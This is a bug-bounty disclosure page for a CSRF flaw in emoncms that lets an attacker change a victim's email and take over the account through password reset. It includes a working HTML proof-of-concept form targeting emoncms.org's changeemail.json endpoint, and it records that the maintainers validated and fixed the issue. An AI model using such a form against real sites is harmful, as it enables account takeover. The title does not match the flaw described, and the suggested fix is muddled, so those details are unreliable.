Improper Authorization in Handler for Custom URL Scheme in emoncms/emoncms

Valid

Reported on

Jul 15th 2021

✍️ Description

In CSRF attack if attacker able to change the victim email then attacker can change email to own email and get password from password reset section and then the account take over happen here.

🕵️‍♂️ Proof of Concept

1.you login in your account 2.you make a file contain the following html file. 3.client should open html ( as victim site) 4.Email going to be changed after click the "Submit request"

// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://emoncms.org/user/changeemail.json">
      <input type="hidden" name="email" value="victim&#64;mail&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

the attacker can take full control of victim account

Fix

you can set cookies on a custom header. this is a fastest way that you can protect your users

Occurrences

profile.js L70

We have contacted a member of the emoncms team and are waiting to hear back a year ago

A emoncms/emoncms maintainer

commented a year ago

Thanks again!

A emoncms/emoncms maintainer validated this vulnerability a year ago

amammad has been awarded the disclosure bounty

The fix bounty is now up for grabs

A emoncms/emoncms maintainer confirmed that a fix has been merged on ca1f5c a year ago

The fix bounty has been dropped

to join this conversation